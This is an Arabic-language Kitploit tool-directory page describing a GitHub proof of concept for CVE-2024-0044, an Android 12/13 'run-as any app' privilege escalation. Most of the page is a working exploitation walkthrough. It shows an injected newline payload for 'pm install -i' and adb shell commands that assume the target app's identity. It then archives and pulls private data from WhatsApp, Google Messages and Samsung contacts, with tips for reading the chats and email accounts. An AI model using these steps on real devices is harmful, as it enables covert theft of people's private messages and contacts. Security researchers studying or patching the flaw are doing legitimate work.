Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve_2024_0044 — CVE-2024-0044: ثغرة عالية الخطورة تتيح التشغيل كأي تطبيق (run-as any app) وتؤثر على إصدارَي أندرويد 12 و13 | Kitploit
أدوات/GitHubGitHub/hunter24x24/cve_2024_0044
أمان أندرويدتصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالتسريب البياناتما بعد الاستغلالاختبار الاختراقأمن الجوال
GitHubhunter24x24/cve_2024_0044

cve_2024_0044

CVE-2024-0044: ثغرة عالية الخطورة تتيح التشغيل كأي تطبيق (run-as any app) وتؤثر على إصدارَي أندرويد 12 و13

عرض المستودع
12منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE 2024 0044

CVE-2024-0044، التي تم تحديدها في دالة createSessionInternal في ملف PackageInstallerService.java، هي ثغرة أمنية عالية الخطورة تؤثر على إصدارَي أندرويد 12 و13. تسمح هذه الثغرة للمهاجم بتنفيذ هجوم "run-as any app"، مما يؤدي إلى تصعيد محلي للصلاحيات دون الحاجة إلى تفاعل المستخدم. تنشأ المشكلة بسبب عدم التحقق السليم من المدخلات داخل دالة createSessionInternal. يمكن للمهاجم استغلال ذلك عن طريق التلاعب بعملية إنشاء الجلسة، مما قد يمنحه وصولًا غير مصرح به إلى البيانات الحساسة وتنفيذ إجراءات غير مصرح بها على الجهاز المتأثر.

تم اكتشاف الاستغلال بواسطة Meta security

تم تلخيص ومشاركة إثبات المفهوم بواسطة Tiny hack

يمكن العثور على تفاصيل التصحيح الأمني في Android security bulletin

المتطلبات الأساسية

  1. فعّل تصحيح أخطاء USB على هاتفك ووصّله بجهازك باستخدام كابل USB أو التصحيح اللاسلكي.
  2. حمّل أي ملف APK إلى جهازك، يمكنك استخدام F-DROID

كيفية استخدام الأداة

root@kitploit:~
python3 cve_2024_0044.py -h
                                                                               
##########################################################################################
###############S%%#####################################################%%S################
###############%++*S##################################################?++?################
################%++*S###############################################S*++?#################
#################%+++%#############################################S*++%##################
##################S*++%###########################################%+++%###################
###################S*++?#########SSS%%?????***?????%%%SS#########%++*S####################
#####################?++*##S%%?**+++++++++++++++++++++++**??%S##?++*S#####################
######################?++**+++++++++++++++++++++++++++++++++++**++*#######################
###################S%?*++++++++++++++++++++++++++++++++++++++++++++?%S####################
#################%?+++++++++++++++++++++++++++++++++++++++++++++++++++*%S#################
##############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++?S###############
############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S#############
##########S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S###########
#########%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##########
#######S*+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S########
######%++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*++++++++++++++%#######
#####%++++++++++++++*######%+++++++++++++++++++++++++++++++++%######?++++++++++++++?######
####?+++++++++++++++*######S+++++++++++++++++++++++++++++++++%######?+++++++++++++++?#####
###%+++++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*+++++++++++++++++?####
##S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%###
##*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S##
#%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##
#*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S#
S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%#      
        
usage: cve_2024_0044.py [-h] -P P -A A

CVE-2024-0044: run-as any app @Pl4int3xt

options:
  -h, --help  show this help message and exit
  -P P        package name (default: None)
  -A A        apk file path (default: None)

-P يُستخدم لتحديد اسم الحزمة الهدف التي تريد التشغيل باسمها

-A لتحديد ملف APK الذي سيتم دفعه إلى الجهاز

الاستغلال

قم بتشغيل الأداة python3 cve_2024_0044.py -P com.whatsapp -A /home/pl4int3xt/Downloads/F-Droid.apk

سيتم إنشاء ملف payload.txt بهذا الشكل

root@kitploit:~
PAYLOAD="@null
victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk

الأداة تؤتمت بعض الأجزاء، والأجزاء الأخرى يدوية. يمكنك الخروج بعد إنشاء الحمولة وتنفيذ جميع الأوامر يدويًا، أو يمكنك المتابعة مع التعليمات

بعد ذلك، ستحتاج إلى الاتصال بجهازك باستخدام adb shell ولصق الحمولة، وتأكد من ظهور رسالة Success بعد تنفيذ الأمر الأخير

root@kitploit:~
pl4int3xt ~>  adb shell
pixel:/ $ PAYLOAD="@null
> victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pixel:/ $ pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk
Success

بعد ذلك، نحصل على بيانات واتساب باستخدام الأوامر التالية

root@kitploit:~
pixel:/ $ mkdir /data/local/tmp/wa/                                                                            
pixel:/ $ touch /data/local/tmp/wa/wa.tar
pixel:/ $ chmod -R 0777 /data/local/tmp/wa/
pixel:/ $ run-as victim
pixel:/data/user/0 $ tar -cf /data/local/tmp/wa/wa.tar com.whatsapp

أنشئ مجلدًا مؤقتًا: mkdir /data/local/tmp/wa/

أنشئ ملفًا مؤقتًا لملف tar: touch /data/local/tmp/wa/wa.tar

امنح صلاحيات كاملة: chmod -R 0777 /data/local/tmp/wa/ لضمان قدرة أي مستخدم على القراءة والكتابة والتنفيذ داخل هذا المجلد.

بدّل سياق المستخدم: run-as victim للحصول على نفس صلاحيات مستخدم "victim".

أرشفة بيانات التطبيق الهدف: tar -cf /data/local/tmp/wa/wa.tar com.whatsapp، لإنشاء ملف tar من مجلد بيانات واتساب.

أخيرًا، اسحب البيانات

adb pull /data/local/tmp/wa/wa.tar

يمكنك استخراج البيانات باستخدام 7z أو أي أداة أخرى.

يمكنك استخدام Whatsapp chat exporter لتحويله إلى HTML.

يتيح لك هذا الحصول على بيانات واتساب دون الحاجة إلى صلاحيات الجذر على جهازك.

سحب رسائل جوجل

فقط غيّر اسم الحزمة كما يلي

root@kitploit:~
plaintext@archlinux ~/D/c/p/cve_2024_0044 (feature)> python3 ./cve_2024_0044.py -P com.google.android.apps.messaging -A ~/Down
loads/F-Droid.apk

اتبع التعليمات أعلاه وبعد سحب ملف wa.tar فك ضغطه وافتح المحادثات في com.google.android.apps.messaging/databases/bugle_db باستخدام sqlitebrowser أو أي أداة أخرى.

سحب جهات الاتصال

تم اختباره على جهاز سامسونج. بالنسبة للأجهزة الأخرى، تحقق من اسم حزمة موفر جهات الاتصال.

root@kitploit:~
plaintext@archlinux ~/D/c/p/cve_2024_0044 (feature)> python3 ./cve_2024_0044.py -P com.samsung.android.app.contacts -A ~/Downloads/F-Droid.apk

اتبع التعليمات أعلاه وبعد سحب ملف wa.tar فك ضغطه وافتح جهات الاتصال في com.samsung.android.providers.contacts/databases/contacts2.db باستخدام sqlitebrowser أو أي أداة أخرى. يحتوي ملف قاعدة البيانات على جميع معلومات حسابات البريد الإلكتروني الخاصة بالمستخدم مع قائمة جهات الاتصال.

تنزيل الأداة